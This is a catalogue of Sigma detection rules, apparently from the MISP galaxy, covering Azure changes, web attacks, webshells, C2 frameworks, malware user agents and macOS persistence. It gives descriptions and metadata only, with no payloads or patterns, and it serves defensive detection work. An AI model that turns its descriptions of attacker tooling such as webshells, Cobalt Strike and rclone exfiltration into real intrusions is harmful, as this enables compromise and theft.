Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/08
falsepositive ['Point-to-site VPN being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Point-to-site VPN modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_network_p2s_vpn_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact']

Azure Keyvault Secrets Modified or Deleted

Identifies when secrets are modified or deleted in Azure.

Internal MISP references

UUID b831353c-1971-477b-abb6-2828edc3bca1 which can be used as unique global reference for Azure Keyvault Secrets Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/16
falsepositive ['Secrets being modified or deleted may be performed by a system administrator.', 'Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_keyvault_secrets_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact', 'attack.credential_access', 'attack.t1552', 'attack.t1552.001']
Related clusters

To see the related clusters, click here.

Azure Kubernetes Network Policy Change

Identifies when a Azure Kubernetes network policy is modified or deleted.

Internal MISP references

UUID 08d6ac24-c927-4469-b3b7-2e422d6e3c43 which can be used as unique global reference for Azure Kubernetes Network Policy Change in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/07
falsepositive ['Network Policy being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Network Policy being modified and deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_kubernetes_network_policy_change.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact', 'attack.credential_access']

Azure Kubernetes Service Account Modified or Deleted

Identifies when a service account is modified or deleted.

Internal MISP references

UUID 12d027c3-b48c-4d9d-8bb6-a732200034b2 which can be used as unique global reference for Azure Kubernetes Service Account Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/07
falsepositive ['Service account being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Service account modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_kubernetes_service_account_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact', 'attack.t1531']
Related clusters

To see the related clusters, click here.

Nginx Core Dump

Detects a core dump of a crashing Nginx worker process, which could be a signal of a serious problem or exploitation attempts.

Internal MISP references

UUID 59ec40bb-322e-40ab-808d-84fa690d7e56 which can be used as unique global reference for Nginx Core Dump in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/05/31
falsepositive ['Serious issues with a configuration or plugin']
filename web_nginx_core_dump.yml
level high
logsource.category No established category
logsource.product No established product
tags ['attack.impact', 'attack.t1499.004']
Related clusters

To see the related clusters, click here.

Apache Threading Error

Detects an issue in apache logs that reports threading related errors

Internal MISP references

UUID e9a2b582-3f6a-48ac-b4a1-6849cdc50b3c which can be used as unique global reference for Apache Threading Error in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/01/22
falsepositive ['3rd party apache modules - https://bz.apache.org/bugzilla/show_bug.cgi?id=46185']
filename web_apache_threading_error.yml
level medium
logsource.category No established category
logsource.product No established product
tags ['attack.initial_access', 'attack.lateral_movement', 'attack.t1190', 'attack.t1210']
Related clusters

To see the related clusters, click here.

Apache Segmentation Fault

Detects a segmentation fault error message caused by a crashing apache worker process

Internal MISP references

UUID 1da8ce0b-855d-4004-8860-7d64d42063b1 which can be used as unique global reference for Apache Segmentation Fault in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/02/28
falsepositive ['Unknown']
filename web_apache_segfault.yml
level high
logsource.category No established category
logsource.product No established product
tags ['attack.impact', 'attack.t1499.004']
Related clusters

To see the related clusters, click here.

Windows Webshell Strings

Detects common commands used in Windows webshells

Internal MISP references

UUID 7ff9db12-1b94-4a79-ba68-a2402c5d6729 which can be used as unique global reference for Windows Webshell Strings in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2017/02/19
falsepositive ['Web sites like wikis with articles on os commands and pages that include the os commands in the URLs', 'User searches in search boxes of the respective website']
filename web_win_webshells_in_access_logs.yml
level high
logsource.category webserver
logsource.product No established product
tags ['attack.persistence', 'attack.t1505.003']
Related clusters

To see the related clusters, click here.

JNDIExploit Pattern

Detects exploitation attempt using the JNDI-Exploit-Kit

Internal MISP references

UUID 412d55bc-7737-4d25-9542-5b396867ce55 which can be used as unique global reference for JNDIExploit Pattern in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/12/12
falsepositive ['Legitimate apps the use these paths']
filename web_jndi_exploit.yml
level high
logsource.category webserver
logsource.product No established product
tags ['attack.initial_access', 'attack.t1190']
Related clusters

To see the related clusters, click here.

SQL Injection Strings In URI

Detects potential SQL injection attempts via GET requests in access logs.

Internal MISP references

UUID 5513deaf-f49a-46c2-a6c8-3f111b5cb453 which can be used as unique global reference for SQL Injection Strings In URI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Saw Win Naung, Nasreddine Bencherchali (Nextron Systems), Thurein Oo (Yoma Bank)
creation_date 2020/02/22
falsepositive ['Java scripts and CSS Files', 'User searches in search boxes of the respective website', 'Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as "User Agent" strings and more response codes']
filename web_sql_injection_in_access_logs.yml
level high
logsource.category webserver
logsource.product No established product
tags ['attack.initial_access', 'attack.t1190']
Related clusters

To see the related clusters, click here.

F5 BIG-IP iControl Rest API Command Execution - Webserver

Detects POST requests to the F5 BIG-IP iControl Rest API "bash" endpoint, which allows the execution of commands on the BIG-IP

Internal MISP references

UUID 85254a62-22be-4239-b79c-2ec17e566c37 which can be used as unique global reference for F5 BIG-IP iControl Rest API Command Execution - Webserver in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Thurein Oo
creation_date 2023/11/08
falsepositive ['Legitimate usage of the BIG IP REST API to execute command for administration purposes']
filename web_f5_tm_utility_bash_api_request.yml
level medium
logsource.category webserver
logsource.product No established product
tags ['attack.execution', 'attack.t1190']
Related clusters

To see the related clusters, click here.

Source Code Enumeration Detection by Keyword

Detects source code enumeration that use GET requests by keyword searches in URL strings

Internal MISP references

UUID 953d460b-f810-420a-97a2-cfca4c98e602 which can be used as unique global reference for Source Code Enumeration Detection by Keyword in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author James Ahearn
creation_date 2019/06/08
falsepositive ['Unknown']
filename web_source_code_enumeration.yml
level medium
logsource.category webserver
logsource.product No established product
tags ['attack.discovery', 'attack.t1083']
Related clusters

To see the related clusters, click here.

Java Payload Strings

Detects possible Java payloads in web access logs

Internal MISP references

UUID 583aa0a2-30b1-4d62-8bf3-ab73689efe6c which can be used as unique global reference for Java Payload Strings in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Harjot Singh, "@cyb3rjy0t" (update)
creation_date 2022/06/04
falsepositive ['Legitimate apps']
filename web_java_payload_in_access_logs.yml
level high
logsource.category webserver
logsource.product No established product
tags ['cve.2022.26134', 'cve.2021.26084', 'attack.initial_access', 'attack.t1190']
Related clusters

To see the related clusters, click here.

Cross Site Scripting Strings

Detects XSS attempts injected via GET requests in access logs

Internal MISP references

UUID 65354b83-a2ea-4ea6-8414-3ab38be0d409 which can be used as unique global reference for Cross Site Scripting Strings in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Saw Win Naung, Nasreddine Bencherchali
creation_date 2021/08/15
falsepositive ['JavaScripts,CSS Files and PNG files', 'User searches in search boxes of the respective website', 'Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as "User Agent" strings and more response codes']
filename web_xss_in_access_logs.yml
level high
logsource.category webserver
logsource.product No established product
tags ['attack.initial_access', 'attack.t1189']
Related clusters

To see the related clusters, click here.

Path Traversal Exploitation Attempts

Detects path traversal exploitation attempts

Internal MISP references

UUID 7745c2ea-24a5-4290-b680-04359cb84b35 which can be used as unique global reference for Path Traversal Exploitation Attempts in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Subhash Popuri (@pbssubhash), Florian Roth (Nextron Systems), Thurein Oo, Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/09/25
falsepositive ['Expected to be continuously seen on systems exposed to the Internet', 'Internal vulnerability scanners']
filename web_path_traversal_exploitation_attempt.yml
level medium
logsource.category webserver
logsource.product No established product
tags ['attack.initial_access', 'attack.t1190']
Related clusters

To see the related clusters, click here.

Detects known suspicious (default) user-agents related to scanning/recon tools

Internal MISP references

UUID 19aa4f58-94ca-45ff-bc34-92e533c0994a which can be used as unique global reference for Suspicious User-Agents Related To Recon Tools in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Tim Shelton
creation_date 2022/07/19
falsepositive ['Unknown']
filename web_susp_useragents.yml
level medium
logsource.category webserver
logsource.product No established product
tags ['attack.initial_access', 'attack.t1190']
Related clusters

To see the related clusters, click here.

Webshell ReGeorg Detection Via Web Logs

Certain strings in the uri_query field when combined with null referer and null user agent can indicate activity associated with the webshell ReGeorg.

Internal MISP references

UUID 2ea44a60-cfda-11ea-87d0-0242ac130003 which can be used as unique global reference for Webshell ReGeorg Detection Via Web Logs in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Cian Heasley
creation_date 2020/08/04
falsepositive ['Web applications that use the same URL parameters as ReGeorg']
filename web_webshell_regeorg.yml
level high
logsource.category webserver
logsource.product No established product
tags ['attack.persistence', 'attack.t1505.003']
Related clusters

To see the related clusters, click here.

Successful IIS Shortname Fuzzing Scan

When IIS uses an old .Net Framework it's possible to enumerate folders with the symbol "~"

Internal MISP references

UUID 7cb02516-6d95-4ffc-8eee-162075e111ac which can be used as unique global reference for Successful IIS Shortname Fuzzing Scan in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/10/06
falsepositive ['Unknown']
filename web_iis_tilt_shortname_scan.yml
level medium
logsource.category webserver
logsource.product No established product
tags ['attack.initial_access', 'attack.t1190']
Related clusters

To see the related clusters, click here.

Suspicious Windows Strings In URI

Detects suspicious Windows strings in URI which could indicate possible exfiltration or webshell communication

Internal MISP references

UUID 9f6a34b4-2688-4eb7-a7f5-e39fef573d0e which can be used as unique global reference for Suspicious Windows Strings In URI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/06
falsepositive ['Legitimate application and websites that use windows paths in their URL']
filename web_susp_windows_path_uri.yml
level high
logsource.category webserver
logsource.product No established product
tags ['attack.persistence', 'attack.exfiltration', 'attack.t1505.003']
Related clusters

To see the related clusters, click here.

Server Side Template Injection Strings

Detects SSTI attempts sent via GET requests in access logs

Internal MISP references

UUID ada3bc4f-f0fd-42b9-ba91-e105e8af7342 which can be used as unique global reference for Server Side Template Injection Strings in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/14
falsepositive ['User searches in search boxes of the respective website', 'Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as "User Agent" strings and more response codes']
filename web_ssti_in_access_logs.yml
level high
logsource.category webserver
logsource.product No established product
tags ['attack.defense_evasion', 'attack.t1221']
Related clusters

To see the related clusters, click here.

PUA - Advanced IP/Port Scanner Update Check

Detect the update check performed by Advanced IP/Port Scanner utilities.

Internal MISP references

UUID 1a9bb21a-1bb5-42d7-aa05-3219c7c8f47d which can be used as unique global reference for PUA - Advanced IP/Port Scanner Update Check in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Axel Olsson
creation_date 2022/08/14
falsepositive ['Expected if you legitimately use the Advanced IP or Port Scanner utilities in your environement.']
filename proxy_pua_advanced_ip_scanner_update_check.yml
level medium
logsource.category proxy
logsource.product No established product
tags ['attack.discovery', 'attack.t1590']
Related clusters

To see the related clusters, click here.

HackTool - Empire UserAgent URI Combo

Detects user agent and URI paths used by empire agents

Internal MISP references

UUID b923f7d6-ac89-4a50-a71a-89fb846b4aa8 which can be used as unique global reference for HackTool - Empire UserAgent URI Combo in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2020/07/13
falsepositive ['Valid requests with this exact user agent to server scripts of the defined names']
filename proxy_hktl_empire_ua_uri_patterns.yml
level high
logsource.category proxy
logsource.product No established product
tags ['attack.defense_evasion', 'attack.command_and_control', 'attack.t1071.001']
Related clusters

To see the related clusters, click here.

APT User Agent

Detects suspicious user agent strings used in APT malware in proxy logs

Internal MISP references

UUID 6ec820f2-e963-4801-9127-d8b2dce4d31b which can be used as unique global reference for APT User Agent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Markus Neis
creation_date 2019/11/12
falsepositive ['Old browsers']
filename proxy_ua_apt.yml
level high
logsource.category proxy
logsource.product No established product
tags ['attack.command_and_control', 'attack.t1071.001']
Related clusters

To see the related clusters, click here.

Potential Base64 Encoded User-Agent

Detects User Agent strings that end with an equal sign, which can be a sign of base64 encoding.

Internal MISP references

UUID 894a8613-cf12-48b3-8e57-9085f54aa0c3 which can be used as unique global reference for Potential Base64 Encoded User-Agent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Brian Ingram (update)
creation_date 2022/07/08
falsepositive ['Unknown']
filename proxy_ua_susp_base64.yml
level medium
logsource.category proxy
logsource.product No established product
tags ['attack.command_and_control', 'attack.t1071.001']
Related clusters

To see the related clusters, click here.

Bitsadmin to Uncommon TLD

Detects Bitsadmin connections to domains with uncommon TLDs

Internal MISP references

UUID 9eb68894-7476-4cd6-8752-23b51f5883a7 which can be used as unique global reference for Bitsadmin to Uncommon TLD in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Tim Shelton
creation_date 2019/03/07
falsepositive ['Rare programs that use Bitsadmin and update from regional TLDs e.g. .uk or .ca']
filename proxy_ua_bitsadmin_susp_tld.yml
level high
logsource.category proxy
logsource.product No established product
tags ['attack.command_and_control', 'attack.t1071.001', 'attack.defense_evasion', 'attack.persistence', 'attack.t1197', 'attack.s0190']
Related clusters

To see the related clusters, click here.

HackTool - BabyShark Agent Default URL Pattern

Detects Baby Shark C2 Framework default communication patterns

Internal MISP references

UUID 304810ed-8853-437f-9e36-c4975c3dfd7e which can be used as unique global reference for HackTool - BabyShark Agent Default URL Pattern in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/06/09
falsepositive ['Unlikely']
filename proxy_hktl_baby_shark_default_agent_url.yml
level critical
logsource.category proxy
logsource.product No established product
tags ['attack.command_and_control', 'attack.t1071.001']
Related clusters

To see the related clusters, click here.

Exploit Framework User Agent

Detects suspicious user agent strings used by exploit / pentest frameworks like Metasploit in proxy logs

Internal MISP references

UUID fdd1bfb5-f60b-4a35-910e-f36ed3d0b32f which can be used as unique global reference for Exploit Framework User Agent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/07/08
falsepositive ['Unknown']
filename proxy_ua_frameworks.yml
level high
logsource.category proxy
logsource.product No established product
tags ['attack.command_and_control', 'attack.t1071.001']
Related clusters

To see the related clusters, click here.

Windows WebDAV User Agent

Detects WebDav DownloadCradle

Internal MISP references

UUID e09aed7a-09e0-4c9a-90dd-f0d52507347e which can be used as unique global reference for Windows WebDAV User Agent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018/04/06
falsepositive ['Administrative scripts that download files from the Internet', 'Administrative scripts that retrieve certain website contents', 'Legitimate WebDAV administration']
filename proxy_downloadcradle_webdav.yml
level high
logsource.category proxy
logsource.product No established product
tags ['attack.command_and_control', 'attack.t1071.001']
Related clusters

To see the related clusters, click here.

Download from Suspicious Dyndns Hosts

Detects download of certain file types from hosts with dynamic DNS names (selected list)

Internal MISP references

UUID 195c1119-ef07-4909-bb12-e66f5e07bf3c which can be used as unique global reference for Download from Suspicious Dyndns Hosts in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/11/08
falsepositive ['Software downloads']
filename proxy_download_susp_dyndns.yml
level medium
logsource.category proxy
logsource.product No established product
tags ['attack.defense_evasion', 'attack.command_and_control', 'attack.t1105', 'attack.t1568']
Related clusters

To see the related clusters, click here.

Suspicious User Agent

Detects suspicious malformed user agent strings in proxy logs

Internal MISP references

UUID 7195a772-4b3f-43a4-a210-6a003d65caa1 which can be used as unique global reference for Suspicious User Agent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/07/08
falsepositive ['Unknown']
filename proxy_ua_susp.yml
level high
logsource.category proxy
logsource.product No established product
tags ['attack.command_and_control', 'attack.t1071.001']
Related clusters

To see the related clusters, click here.

Telegram API Access

Detects suspicious requests to Telegram API without the usual Telegram User-Agent

Internal MISP references

UUID b494b165-6634-483d-8c47-2026a6c52372 which can be used as unique global reference for Telegram API Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018/06/05
falsepositive ['Legitimate use of Telegram bots in the company']
filename proxy_telegram_api.yml
level medium
logsource.category proxy
logsource.product No established product
tags ['attack.defense_evasion', 'attack.command_and_control', 'attack.t1071.001', 'attack.t1102.002']
Related clusters

To see the related clusters, click here.

Download From Suspicious TLD - Whitelist

Detects executable downloads from suspicious remote systems

Internal MISP references

UUID b5de2919-b74a-4805-91a7-5049accbaefe which can be used as unique global reference for Download From Suspicious TLD - Whitelist in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/03/13
falsepositive ['All kind of software downloads']
filename proxy_download_susp_tlds_whitelist.yml
level low
logsource.category proxy
logsource.product No established product
tags ['attack.initial_access', 'attack.t1566', 'attack.execution', 'attack.t1203', 'attack.t1204.002']
Related clusters

To see the related clusters, click here.

Malware User Agent

Detects suspicious user agent strings used by malware in proxy logs

Internal MISP references

UUID 5c84856b-55a5-45f1-826f-13f37250cf4e which can be used as unique global reference for Malware User Agent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2017/07/08
falsepositive ['Unknown']
filename proxy_ua_malware.yml
level high
logsource.category proxy
logsource.product No established product
tags ['attack.command_and_control', 'attack.t1071.001']
Related clusters

To see the related clusters, click here.

HTTP Request With Empty User Agent

Detects a potentially suspicious empty user agent strings in proxy log. Could potentially indicate an uncommon request method.

Internal MISP references

UUID 21e44d78-95e7-421b-a464-ffd8395659c4 which can be used as unique global reference for HTTP Request With Empty User Agent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/07/08
falsepositive ['Unknown']
filename proxy_ua_empty.yml
level medium
logsource.category proxy
logsource.product No established product
tags ['attack.defense_evasion', 'attack.command_and_control', 'attack.t1071.001']
Related clusters

To see the related clusters, click here.

Windows PowerShell User Agent

Detects Windows PowerShell Web Access

Internal MISP references

UUID c8557060-9221-4448-8794-96320e6f3e74 which can be used as unique global reference for Windows PowerShell User Agent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/03/13
falsepositive ['Administrative scripts that download files from the Internet', 'Administrative scripts that retrieve certain website contents']
filename proxy_ua_powershell.yml
level medium
logsource.category proxy
logsource.product No established product
tags ['attack.defense_evasion', 'attack.command_and_control', 'attack.t1071.001']
Related clusters

To see the related clusters, click here.

Suspicious Network Communication With IPFS

Detects connections to interplanetary file system (IPFS) containing a user's email address which mirrors behaviours observed in recent phishing campaigns leveraging IPFS to host credential harvesting webpages.

Internal MISP references

UUID eb6c2004-1cef-427f-8885-9042974e5eb6 which can be used as unique global reference for Suspicious Network Communication With IPFS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Gavin Knapp
creation_date 2023/03/16
falsepositive ['Legitimate use of IPFS being used in the organisation. However the cs-uri regex looking for a user email will likely negate this.']
filename proxy_susp_ipfs_cred_harvest.yml
level low
logsource.category proxy
logsource.product No established product
tags ['attack.credential_access', 'attack.t1056']
Related clusters

To see the related clusters, click here.

Bitsadmin to Uncommon IP Server Address

Detects Bitsadmin connections to IP addresses instead of FQDN names

Internal MISP references

UUID 8ccd35a2-1c7c-468b-b568-ac6cdf80eec3 which can be used as unique global reference for Bitsadmin to Uncommon IP Server Address in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/06/10
falsepositive ['Unknown']
filename proxy_ua_bitsadmin_susp_ip.yml
level high
logsource.category proxy
logsource.product No established product
tags ['attack.command_and_control', 'attack.t1071.001', 'attack.defense_evasion', 'attack.persistence', 'attack.t1197', 'attack.s0190']
Related clusters

To see the related clusters, click here.

Rclone Activity via Proxy

Detects the use of rclone, a command-line program to manage files on cloud storage, via its default user-agent string

Internal MISP references

UUID 2c03648b-e081-41a5-b9fb-7d854a915091 which can be used as unique global reference for Rclone Activity via Proxy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Janantha Marasinghe
creation_date 2022/10/18
falsepositive ['Valid requests with this exact user agent to that is used by legitimate scripts or sysadmin operations']
filename proxy_ua_rclone.yml
level medium
logsource.category proxy
logsource.product No established product
tags ['attack.exfiltration', 'attack.t1567.002']
Related clusters

To see the related clusters, click here.

Crypto Miner User Agent

Detects suspicious user agent strings used by crypto miners in proxy logs

Internal MISP references

UUID fa935401-513b-467b-81f4-f9e77aa0dd78 which can be used as unique global reference for Crypto Miner User Agent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/10/21
falsepositive ['Unknown']
filename proxy_ua_cryptominer.yml
level high
logsource.category proxy
logsource.product No established product
tags ['attack.command_and_control', 'attack.t1071.001']
Related clusters

To see the related clusters, click here.

F5 BIG-IP iControl Rest API Command Execution - Proxy

Detects POST requests to the F5 BIG-IP iControl Rest API "bash" endpoint, which allows the execution of commands on the BIG-IP

Internal MISP references

UUID b59c98c6-95e8-4d65-93ee-f594dfb96b17 which can be used as unique global reference for F5 BIG-IP iControl Rest API Command Execution - Proxy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Thurein Oo
creation_date 2023/11/08
falsepositive ['Legitimate usage of the BIG IP REST API to execute command for administration purposes']
filename proxy_f5_tm_utility_bash_api_request.yml
level medium
logsource.category proxy
logsource.product No established product
tags ['attack.initial_access', 'attack.t1190']
Related clusters

To see the related clusters, click here.

Raw Paste Service Access

Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form

Internal MISP references

UUID 5468045b-4fcc-4d1a-973c-c9c9578edacb which can be used as unique global reference for Raw Paste Service Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/12/05
falsepositive ['User activity (e.g. developer that shared and copied code snippets and used the raw link instead of just copy & paste)']
filename proxy_raw_paste_service_access.yml
level high
logsource.category proxy
logsource.product No established product
tags ['attack.command_and_control', 'attack.t1071.001', 'attack.t1102.001', 'attack.t1102.003', 'attack.defense_evasion']
Related clusters

To see the related clusters, click here.

Suspicious Base64 Encoded User-Agent

Detects suspicious encoded User-Agent strings, as seen used by some malware.

Internal MISP references

UUID d443095b-a221-4957-a2c4-cd1756c9b747 which can be used as unique global reference for Suspicious Base64 Encoded User-Agent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/04
falsepositive ['Unknown']
filename proxy_ua_base64_encoded.yml
level medium
logsource.category proxy
logsource.product No established product
tags ['attack.command_and_control', 'attack.t1071.001']
Related clusters

To see the related clusters, click here.

Download From Suspicious TLD - Blacklist

Detects download of certain file types from hosts in suspicious TLDs

Internal MISP references

UUID 00d0b5ab-1f55-4120-8e83-487c0a7baf19 which can be used as unique global reference for Download From Suspicious TLD - Blacklist in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/11/07
falsepositive ['All kinds of software downloads']
filename proxy_download_susp_tlds_blacklist.yml
level low
logsource.category proxy
logsource.product No established product
tags ['attack.initial_access', 'attack.t1566', 'attack.execution', 'attack.t1203', 'attack.t1204.002']
Related clusters

To see the related clusters, click here.

HackTool - CobaltStrike Malleable Profile Patterns - Proxy

Detects cobalt strike malleable profiles patterns (URI, User-Agents, Methods).

Internal MISP references

UUID f3f21ce1-cdef-4bfc-8328-ed2e826f5fac which can be used as unique global reference for HackTool - CobaltStrike Malleable Profile Patterns - Proxy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis, Florian Roth (Nextron Systems)
creation_date 2024/02/15
falsepositive ['Unknown']
filename proxy_hktl_cobalt_strike_malleable_c2_requests.yml
level high
logsource.category proxy
logsource.product No established product
tags ['attack.defense_evasion', 'attack.command_and_control', 'attack.t1071.001']
Related clusters

To see the related clusters, click here.

PwnDrp Access

Detects downloads from PwnDrp web servers developed for red team testing and most likely also used for criminal activity

Internal MISP references

UUID 2b1ee7e4-89b6-4739-b7bb-b811b6607e5e which can be used as unique global reference for PwnDrp Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2020/04/15
falsepositive ['Unknown']
filename proxy_pwndrop.yml
level critical
logsource.category proxy
logsource.product No established product
tags ['attack.command_and_control', 'attack.t1071.001', 'attack.t1102.001', 'attack.t1102.003']
Related clusters

To see the related clusters, click here.

Hack Tool User Agent

Detects suspicious user agent strings user by hack tools in proxy logs

Internal MISP references

UUID c42a3073-30fb-48ae-8c99-c23ada84b103 which can be used as unique global reference for Hack Tool User Agent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/07/08
falsepositive ['Unknown']
filename proxy_ua_hacktool.yml
level high
logsource.category proxy
logsource.product No established product
tags ['attack.initial_access', 'attack.t1190', 'attack.credential_access', 'attack.t1110']
Related clusters

To see the related clusters, click here.

Flash Player Update from Suspicious Location

Detects a flashplayer update from an unofficial location

Internal MISP references

UUID 4922a5dd-6743-4fc2-8e81-144374280997 which can be used as unique global reference for Flash Player Update from Suspicious Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/10/25
falsepositive ['Unknown flash download locations']
filename proxy_susp_flash_download_loc.yml
level high
logsource.category proxy
logsource.product No established product
tags ['attack.initial_access', 'attack.t1189', 'attack.execution', 'attack.t1204.002', 'attack.defense_evasion', 'attack.t1036.005']
Related clusters

To see the related clusters, click here.

Search-ms and WebDAV Suspicious Indicators in URL

Detects URL pattern used by search(-ms)/WebDAV initial access campaigns.

Internal MISP references

UUID 5039f3d2-406a-4c1a-9350-7a5a85dc84c2 which can be used as unique global reference for Search-ms and WebDAV Suspicious Indicators in URL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Micah Babinski
creation_date 2023/08/21
falsepositive ['Unknown']
filename proxy_webdav_search_ms.yml
level high
logsource.category proxy
logsource.product No established product
tags ['attack.initial_access', 'attack.t1584', 'attack.t1566']
Related clusters

To see the related clusters, click here.

Startup Items

Detects creation of startup item plist files that automatically get executed at boot initialization to establish persistence.

Internal MISP references

UUID dfe8b941-4e54-4242-b674-6b613d521962 which can be used as unique global reference for Startup Items in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alejandro Ortuno, oscd.community
creation_date 2020/10/14
falsepositive ['Legitimate administration activities']
filename file_event_macos_startup_items.yml
level low
logsource.category file_event
logsource.product macos
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1037.005']
Related clusters

To see the related clusters, click here.

MacOS Emond Launch Daemon

Detects additions to the Emond Launch Daemon that adversaries may use to gain persistence and elevate privileges.

Internal MISP references

UUID 23c43900-e732-45a4-8354-63e4a6c187ce which can be used as unique global reference for MacOS Emond Launch Daemon in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alejandro Ortuno, oscd.community
creation_date 2020/10/23
falsepositive ['Legitimate administration activities']
filename file_event_macos_emond_launch_daemon.yml
level medium
logsource.category file_event
logsource.product macos
